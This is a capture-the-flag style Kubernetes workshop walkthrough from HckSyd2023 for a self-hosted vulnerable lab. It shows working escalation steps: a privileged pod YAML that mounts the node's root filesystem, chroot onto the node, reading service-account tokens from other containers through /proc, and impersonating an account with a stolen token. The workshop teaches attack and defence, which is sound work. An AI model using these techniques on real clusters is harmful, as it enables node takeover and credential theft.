HckSyd2023 Kubernetes Workshop
Table of Contents
Welcome⌗
Welcome to the workshop :)
All you’ll need to get involved is:
- kubectl
(Optional) Creating the lab⌗
Pre-requisites:
- Vagrant
- Virtualbox
- A stable internet connection
The project is located here.
Use vagrant to create the machines:
vagrant up
vagrant ssh kubemaster
Run two deploy scripts to join the two nodes to the cluster, and set-up the lab:
sh deploy.sh
cd kubernetes-workshop
sh deploy.sh
Getting connected to the lab⌗
The lab defines a socks proxy that allows us to connect to resources via the
kubemaster machine. You’ll need to keep the HTTPS_PROXY
environment variable populated with
the socks proxy. kubectl
ignores proxychains (tell me about it), so you’ll
need to do it this way:
export HTTPS_PROXY=socks5://ip.of.machine.hosting:1080
This IP address will be 127.0.0.1 if you self-host the lab, but if you are connecting to another instance then you should put the IP of the machine hosting the cluster. (i.e. this should be provided to you).
If you are self-deploying, during the last step of deploying demo-vulnerable-path you should see:
http://ip.goes.here.plz:8080/ to get your config, and off you go!
Take note of this, it’s where you’ll get your first starting kubeconfig.
If you are working in someone else’s lab environment, then this URL should also be provided.
Goals⌗
The lab environment consists of three nodes:
- kubemaster
- kubenode01
- kubenode02
Starting with a limited access Kubernetes config, your goal is to escalate
privileges and access the system-manager-configuration
secret. Along the path
to this there are a number of flags, which require you to:
- Connect and communicate with the cluster, and retrieve a secret
- Deploy a malicious pod to take control of a node
- Explore running containers on nodes to discover service accounts
- Explore the cluster as a service account to find the final flag
Two additional flags are also available for those that look into the container registry 👀.
Now if you don’t want any spoilers and just want to give it a go…
Connect and communicate⌗
To retrieve our initial kubeconfig:
curl ip.goes.here.plz:8080 > kubeconfig #the IP _should_ be 10.244.2.2
We can then use this config with kubectl
:
kubectl --kubeconfig=kubeconfig version
Rather then having to type --kubeconfig=
all the time, we can opt to move
this file so that it’s our user’s Kubernetes configuration:
mkdir -p ~/.kube/
mv kubeconfig ~/.kube/config
Just don’t overwrite your production config if you already use K8S!
Now, let’s use this to investigate!
Let’s see what our permissions are:
kubectl auth can-i --list
Alright, let’s check out secrets!
kubectl get secrets
NAME TYPE DATA AGE
dev-user-token kubernetes.io/service-account-token 3 19m
first-flag Opaque 1 19m
Well, one of these looks relevant!
kubectl get secret first-flag -o json
Surely you can figure out the incredibly complex encryption! (CyberChef is always a help).
Bad PODs⌗
Alright, from here we are really going to get into the weeds. Feel free to ask lots of questions, because this part is going to assume you know quite a bit about containers and how they work under the hood, as well as Linux.
Okay, so our restricted user has access to create pods in our namespace, so let’s create a mallicious pod and get more access.
When creating our bad pod, we should really try and use images that already exist in the cluster. So what should we use, well let’s see if we can view any existing pods:
kubectl get pods
NAME READY STATUS RESTARTS AGE
dev-space-key-provider 1/1 Running 0 9m27s
test-box 1/1 Running 0 9m27s
kubectl describe pod test-box
In here we can find:
image: 192.168.0.2:5000/tinycore:latest
That sounds handy, (also, that looks like a local registry 👀), lets use it!
Let’s make a pod that is a single container that:
- Runs as root
- Mounts the node it’s run on
We can then use archaic Linux magic (chroot
) to start playing with the node!
Lets make a pod config file, maybe our_cool_pod.yaml
, and push it into the
cluster:
apiVersion: v1
kind: Pod
metadata:
name: put-your-own-name-here-or-ill-find-you
labels:
cool: labels
are: cool
spec:
hostNetwork: true #
hostPID: true # If you want systemctl or ps to work, these are important
hostIPC: true #
containers:
- name: super-cool-normal-pod
image: 192.168.0.2:5000/tinycore:latest
securityContext:
privileged: true
runAsUser: 0
runAsGroup: 0
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ] # Keep our pod alive!
nodeSelector:
kubernetes.io/hostname: kubenode01 # Optional, but do this ;)
volumes:
- name: noderoot
hostPath:
path: /
kubectl apply -f our_cool_pod.yaml
Let’s check on our pod and see if it’s up and running:
kubectl get pod put-your-own-name-here-or-ill-find-you
NAME READY STATUS RESTARTS AGE
put-your-own-name-here-or-ill-find-you 1/1 Running 0 4s
Now let’s jump into it!
kubectl exec put-your-own-name-here-or-ill-find-you -it -- /bin/sh
Cool, this is our container, and if we navigate to /host
we’ll see the
filesystem of the node. Since our UID and GID match all of the files (we’re
root), we can read and edit any of the files on the node! Maybe there’s a file
here you can spot ;).
Alright, that’s great, but we kind of want to be able to run commands on our
node… do we need to set up a reverse shell or something? no! chroot
to the
rescue:
chroot /host /bin/bash
Moving around a node⌗
Alright, our node is running other workloads right? from other namespaces! Well, this is where we can use some sneaky tricks:
By default, the default service account for a namespace is mounted inside a container, so if we do:
echo $(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
We can find out what namespace a pod is being run in.
Secondly, since we are on the node now, we can look at all the pids being run by the container runtime… which is uh…
ps aux
root ... /usr/bin/crun --root /run/runc --systemd-c
CRUN! It’s CRUN! with a slightly different root folder? weird. Okay let’s see what containers are running
crun --root /run/runc list
Now I’m not going to put the output here… but it’s a lot and it’s mostly
useless, the important part is that we can see the PIDs of containers though
(using crun --root /run/runc list | cut -d$' ' -f 2
for all you bash lovers):
0
0
0
2001
2180
2345
2353
8037
Now, containers are just processes that are told to use a different root folder, and operated using managed resources. Where does Linux store these file systems though? well…:
/proc/2001/root/
/proc/2180/root/
/proc/2345/root/
Yup, it stores them in a folder called root in the /proc/
fs. Okay so we know
that each of these is a pod, that has an auto mounted service account token…
echo $(cat /proc/2001/root/var/run/secrets/kubernetes.io/serviceaccount/namespace)
Cool, we have a way to figure out which pods belong to which namespaces. Eventually, you’ll find an interesting pod:
echo $(cat /proc/2353/root/var/run/secrets/kubernetes.io/serviceaccount/namespace)
system-manager
This container looks exciting, let’s take a closer look… by chrooting in ;)
chroot /proc/2353/root
cat /etc/hostname
something-like-rancher
Okay, well, rancher is used to configure other services, sometimes even Kubernetes, so maybe this container has:
- A mounted secret
- A secret given to the process
- A privileged Kubernetes service account
Let’s go through and check one by one:
/ # mount
mount: no /proc/mounts
Okay… no easy way to find out mounts.
/ # ps
PID USER COMMAND
1 tc /bin/sh -c -- while true; do sleep 30; done;
Alright the main process PID is 1, let’s check out the environ:
/ # cat /proc/1/environ | tr '\0' '\n'
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TERM=xterm
HOSTNAME=something-like-rancher
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
HOME=/home/tc
Okay, nothing too interesting there. Let’s check out the service account.
Let’s take a look at the token (stored in /var/run/secrets/kubernetes.io/serviceaccount/token
) in a JWT decoder like https://jwt.io/
.
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1732189135,
"iat": 1700653135,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "system-manager",
"pod": {
"name": "something-like-rancher",
"uid": "64b447cd-275a-428b-b6da-a0cfde91acaf"
},
"serviceaccount": {
"name": "manager",
"uid": "3eac23fd-c9fe-4a43-8368-25066d7629b0"
},
"warnafter": 1700656742
},
"nbf": 1700653135,
"sub": "system:serviceaccount:system-manager:manager"
}
Okay well I can confirm that the service account name manager
is definitely
not standard, so maybe it has permissions.
Impersonating a service account⌗
Let’s craft a new Kubernetes config, sa-config
that we can use to authenticate as this service account. We can model it off
our existing one, with a few small tweaks:
# ...
contexts:
- context:
cluster: mycluster
namespace: system-manager
user: manager
name: system-manager
current-context: system-manager
kind: Config
preferences: {}
users:
- name: manager
user:
token: the-token-from-/var/run/secrets/kubernetes.io/serviceaccount/token
kubectl --kubeconfig=sa-config get pod
From here, the final flag is within grasp. Think about what new resources could this service account have access to that we want?
Good luck, and thanks for giving the workshop lab a go!
Container registry flags⌗
I’m going to leave this mostly as a bonus challenge for you to figure out,
just look at the /etc/containers/registries.conf.d/
folder on one of
the nodes within the cluster to start your journey.
If you get stuck on the second container, check out:
Good luck!